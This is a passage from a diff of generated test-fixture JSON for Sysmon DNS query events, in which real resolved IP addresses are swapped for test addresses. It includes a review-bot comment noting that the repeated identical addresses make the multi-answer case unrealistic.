Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:50.357Z", @@ -9216,27 +9123,27 @@ "type": "CNAME" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.66.2", - "151.101.130.2", - "151.101.194.2", - "151.101.2.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
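Review bot: `dns.resolved_ip` and the `answers[].data` entries in this hunk now hold four copies of `89.160.20.156`, which no real resolver response would return, while `related.ip` in the next hunk is deduplicated to a single entry; the same pattern appears in the hunks at `@@ -9321`, `@@ -9557` and `@@ -9709`. Mapping each original address to a different address from the supported subset would keep the multi-answer case representative and keep the `related.ip` deduplication visible in the fixture. As this is generated expected output, the replacement is presumably made in the source log and regenerated, so that is where the change belongs.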
@@ -9252,16 +9159,13 @@ "api-s2s.taboola.com" ], "ip": [ - "151.101.66.2", - "151.101.130.2", - "151.101.194.2", - "151.101.2.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741724600Z", + "ingested": "2021-12-09T13:50:23.457089Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9321,17 +9225,17 @@ }, "answers": [ { - "data": "35.231.30.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.196.212.198", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "35.231.30.22", - "35.196.212.198" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -9346,14 +9250,13 @@ "x.bidswitch.net" ], "ip": [ - "35.231.30.22", - "35.196.212.198" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741730600Z", + "ingested": "2021-12-09T13:50:23.457094800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.231.30.22;::ffff:35.196.212.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9417,11 +9320,11 @@ "type": "CNAME" }, { - "data": "199.166.0.26", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9429,7 +9332,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9437,7 +9340,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9445,7 +9348,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -9453,21 +9356,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.26", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -9483,22 +9386,22 @@ "pixel.adsafeprotected.com" ], "ip": [ - "199.166.0.26", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741736100Z", + "ingested": "2021-12-09T13:50:23.457101100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9557,19 +9460,19 @@ }, "answers": [ { - "data": "35.171.48.231", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.206.107.32", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.175.80.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9577,7 +9480,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9585,7 +9488,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9593,7 +9496,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9601,23 +9504,23 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "35.171.48.231", - "52.206.107.32", - "35.175.80.59", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -9632,24 +9535,22 @@ "ml314.com" ], "ip": [ - "35.171.48.231", - "52.206.107.32", - "35.175.80.59", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741741100Z", + "ingested": "2021-12-09T13:50:23.457106900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9709,15 +9610,15 @@ }, "answers": [ { - "data": "156.154.200.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "63.251.88.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9725,7 +9626,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9733,7 +9634,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9741,7 +9642,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9749,7 +9650,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -9758,17 +9659,17 @@ } ], "resolved_ip": [ - "156.154.200.36", - "63.251.88.56", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, 
@@ -9784,24 +9685,23 @@ "aa.agkn.com" ], "ip": [ - "156.154.200.36", - "63.251.88.56", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741746300Z", + "ingested": "2021-12-09T13:50:23.457112700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9865,11 +9765,11 @@ "type": "CNAME" }, { - "data": "172.217.10.134", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9877,7 +9777,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9885,7 +9785,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9893,7 +9793,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9901,21 +9801,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "172.217.10.134", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -9931,22 +9831,22 @@ "s0.2mdn.net" ], "ip": [ - "172.217.10.134", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741750500Z", + "ingested": "2021-12-09T13:50:23.457118400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData 